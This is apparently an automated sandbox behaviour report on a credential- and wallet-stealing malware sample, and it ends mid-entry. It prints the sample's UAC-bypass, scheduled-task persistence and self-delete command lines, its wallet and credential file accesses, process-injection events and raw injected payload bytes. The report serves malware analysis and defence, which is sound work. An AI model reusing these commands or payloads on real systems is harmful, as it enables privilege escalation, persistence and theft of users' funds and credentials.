RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00020019
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
2 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000388
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x0000037c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x00000384
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x0000038c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3936
process_handle: 0x000002ac
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3936
process_handle: 0x000002ac
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3972
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3972
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3228
process_handle: 0x000002ac
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 3228
process_handle: 0x000002ac
1 0 0
cmdline C:\Windows\System32\cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
cmdline cmd.exe /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
cmdline reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline reg delete hkcu\Environment /v windir /f
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
cmdline "C:\Windows\System32\cmd.exe" /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
cmdline taskkill /pid 2760
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
cmdline schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
buffer Buffer with sha1: 8382485db0e6a0bd2a63dc666272009781398c66
buffer Buffer with sha1: 520d0f21a1483b4f0a21ef8ac6e7320a9650e812
buffer Buffer with sha1: 2d03658003ce6e527cfb893a0e6b9734326f27c5
buffer Buffer with sha1: 6ca69d1f05c9c596d233d180be696fb699bcd598
host 34.89.184.90
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3844
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000036c
1 0 0

NtProtectVirtualMemory

 process_identifier: 2532
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1511424
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00672000
process_handle: 0x00000540
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3936
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b4
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 4008
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3228
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3184
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3156
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000368
1 0 0

NtProtectVirtualMemory

 process_identifier: 3248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1511424
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00672000
process_handle: 0x00000538
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4076
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3936
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002ac
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description rc.exe tried to sleep 13641186 seconds, actually delayed analysis time by 13641186 seconds
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rtzvmiu reg_value C:\Users\Public\Libraries\uimvztR.url
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Ghvhkln reg_value C:\Users\Public\Libraries\nlkhvhG.url
file C:\Users\test22\AppData\Roaming\EditPlus\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\EditPlus\wallet.dat
file C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe\wallet.dat
file C:\Users\test22\AppData\Roaming\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe\wallet.dat
file C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Thunderbird\wallets\wallet.dat
file C:\Users\test22\AppData\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Sun\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Identities\wallet.dat
file C:\Users\test22\AppData\Roaming\Identities\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Macromedia\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Microsoft\wallet.dat
file C:\Users\test22\AppData\Roaming\HNC\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Adobe\wallet.dat
file C:\Users\test22\AppData\Roaming\Mozilla\wallet.dat
file C:\Users\test22\AppData\Roaming\Adobe\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Sun\wallet.dat
file C:\Users\test22\AppData\Roaming\HNC\wallet.dat
file C:\Users\test22\AppData\Roaming\wallet.dat
file C:\Users\test22\AppData\Roaming\Thunderbird\wallet.dat
file C:\Users\test22\AppData\wallet.dat
file C:\Users\test22\AppData\Roaming\Microsoft\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Macromedia\wallet.dat
file C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Mozilla\wallets\wallet.dat
file C:\Users\test22\AppData\Roaming\Bitcoin\
file C:\Users\test22\AppData\Roaming\Electrum\wallets\
file C:\Users\test22\AppData\Roaming\Litecoin\
file C:\Users\test22\AppData\Roaming\Namecoin\
file C:\Users\test22\AppData\Roaming\Terracoin\
file C:\Users\test22\AppData\Roaming\Primecoin\
file C:\Users\test22\AppData\Roaming\Freicoin\
file C:\Users\test22\AppData\Roaming\devcoin\
file C:\Users\test22\AppData\Roaming\Franko\
file C:\Users\test22\AppData\Roaming\Megacoin\
file C:\Users\test22\AppData\Roaming\Infinitecoin\
file C:\Users\test22\AppData\Roaming\Ixcoin\
file C:\Users\test22\AppData\Roaming\Anoncoin\
file C:\Users\test22\AppData\Roaming\BBQCoin\
file C:\Users\test22\AppData\Roaming\digitalcoin\
file C:\Users\test22\AppData\Roaming\Mincoin\
file C:\Users\test22\AppData\Roaming\GoldCoin (GLD)\
file C:\Users\test22\AppData\Roaming\YACoin\
file C:\Users\test22\AppData\Roaming\Florincoin\
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.py
file C:\Python27\agent.pyw
file C:\Users\test22\AppData\Roaming\filezilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x0050f84a
hook_identifier: 14 (WH_MOUSE_LL)
module_address: 0x00000000
1 131395 0
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Process injection Process 2568 manipulating memory of non-child process 3844
Process injection Process 2852 manipulating memory of non-child process 3936
Process injection Process 2852 manipulating memory of non-child process 3972
Process injection Process 2856 manipulating memory of non-child process 3228
Process injection Process 3476 manipulating memory of non-child process 3936
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3844
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000036c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3936
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b4
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3228
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 3936
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002ac
1 0 0
Process injection Process 2568 injected into non-child 3844
Process injection Process 3476 injected into non-child 3936
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ àÌlã“Ì4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyright*LegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>
base_address: 0x0040e000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer: À 7
base_address: 0x00410000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer: <0>(0>h0>J0>X0>v0>KERNEL32.DLLExitProcessGetProcAddressLoadLibraryAVirtualProtect >2759P9T9X9\9p9´9À9 >2759P9T9X9\9p9´9À9
base_address: 0x007e3000
process_identifier: 2532
process_handle: 0x00000540
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2532
process_handle: 0x00000540
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 4008
process_handle: 0x000002b8
1 1 0

WriteProcessMemory

 buffer:  €8€P€h€€ €Dè‚êD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo€000004b0,FileDescription 0FileVersion0.0.0.08 InternalNameuactest.exe(LegalCopyright @ OriginalFilenameuactest.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00408000
process_identifier: 4008
process_handle: 0x000002b8
1 1 0

WriteProcessMemory

 buffer: ` p1
base_address: 0x0040a000
process_identifier: 4008
process_handle: 0x000002b8
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 4008
process_handle: 0x000002b8
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 3184
process_handle: 0x000002b4
1 1 0

WriteProcessMemory

 buffer: 0 ð;
base_address: 0x00406000
process_identifier: 3184
process_handle: 0x000002b4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3184
process_handle: 0x000002b4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 2464
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: Ø*è*ú*++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@ˆ%@È!@€!@ø#@P @à @˜ @%@ "@8!@B”` ´¸)¸B”`GCTL­.text$mn 0.idata$50 ˆ .rdata¸)´.rdata$zzzdbgl*(.idata$2”*.idata$3¨*0.idata$4Ø*¶.idata$60`.bss¨*`+ Ð*‚+( Ø*è*ú*++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObject†CloseHandle^ExitProcessåCreateProcessW­CopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll
base_address: 0x00402000
process_identifier: 2464
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 2464
process_handle: 0x00000538
0 0

WriteProcessMemory

